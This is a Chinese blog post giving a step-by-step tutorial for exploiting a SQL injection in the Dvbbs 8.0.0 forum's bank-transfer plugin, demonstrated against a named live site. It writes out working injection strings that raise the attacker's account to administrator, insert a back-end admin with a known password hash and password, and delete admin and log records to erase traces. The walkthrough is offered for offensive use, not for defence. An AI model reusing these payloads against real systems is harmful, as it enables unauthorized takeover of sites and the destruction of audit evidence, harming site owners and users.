首页 | 心情日记 | 建站心得 | 编程技术 | 大盘分析 | 股市信息 | 学习园地 | 电脑技巧 | 物流外贸 | 另类其它 | 站长推荐 | 给我留言 | 相册

用户登陆
用户:
密码:
 
不保存保存一天
保存一月保存一年

站点日历
73 2024 - 11 48
     12
3456789
10111213141516
17181920212223
24252627282930


站点统计

最新评论

日志搜索

 标题   内容


黑客中文网专用ASP小马 黑客必知SQL语句
未知 利用Powered By Dvbbs Version 8.0.0的银行插件漏动直达后台权限   [ 日期:2008-04-15 15:10:24 ]   [ 来自:本站原创 ]

海外邮件中继,海外退信中继,美国高速VPS,不限流量VPN,邮局维护和管理,邮件网关,EMOS邮件中继,POSTFIX邮件中继,Winwebmail邮件中继,Winmail邮件中继,DBMail邮件中继,JDMail邮件中继,Exchange邮件中继,MDaemon邮件中继 淘宝店:http://shantan.taobao.com 云邮科技官网:www.yunrelay.com

【字体设置:
今天给大家讲的是利用Powered By Dvbbs Version 8.0.0
的银行插件漏动直达后台权限...
好了.我们现在开始
大家看下这个站  http://www.fifabbs.com.cn/index.html   做的还不错~~
我已经通知管理员修补了的哈~~~大家都别来这里了啊
好了 我们先注册..我注册好了 hackycz   等级:注册用户
来到 互动的社区银行~~

看转帐这里,我们先存点进去    v 转账√ 就是可以转了,我们用的就是这个转帐
这个是提升为前台管理员的代码


test1';update/**/Dv_User/**/set/**/UserGroupID=1/**/where[UserName]='hackycz';--

会提升没有这个人哈,我们重新登陆下
是不是管理   这个有了   前台有了,不过没有什么用,我们要提升后台..我们回到银行
哪个地方还是转帐
输入我们的后台代码

密码我们要用MD5加密的,我随便写个
密码要用MD5加密的,我随便生成个 c7e715b2f1c9bc30密码就是258369   .待会工具打包哈~~
我们可以输代码了 都知道把

test1';Insert into Dv_admin(Password,Username,Adduser,Flag) values('c7e715b2f1c9bc30','hackycz','hackycz','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37');--

还是这个提示 
好,我们来到后台~~
试试能不能进去~~密码就是258369

接下来要做什么就你们自己发挥了.我 重点 说的是要擦干净我们留下的痕迹

这里有2段代码
删除后台管理员日志用户名
test1';DELETE FROM dv_admin WHERE username='hackycz';--
test1';DELETE FROM dv_log WHERE l_username='hackycz';--
我们再看看能不能进后台 
您输入的用户名和密码不正确或者您不是系统管理员。请<a href=admin_login.asp>重新输入</a>您的密码。返回后请刷新登录页面后重新输入正确的信息。 
呵呵,日志都清楚了   我们接下来
前台用户变为普通用户:我们所有的操作都在转帐里面完成的
test1';update/**/Dv_User/**/set/**/UserGroupID=9/**/where[UserName]='hackycz';--

好,重新登陆 看,是不是没有了啊
呵呵,好了

暂时没有评论
   发表评论 - 不要忘了输入验证码哦!
作者: 用户:  密码:  我要注册 验证码: 
为防止广告注册机程序,验证码不会自动显示,请点击此处显示或者(刷新)验证码!
评论:

禁止表情
禁止UBB
禁止图片
识别链接
识别关键字
确定发布?
最多可以输入200个字,目前你已经输入了0个字;你今日还可以发表10条评论!
 
   

CopyRight © 2008-2010 广东金融学院030904班 All Rights Reserved
Powered by www.030904.com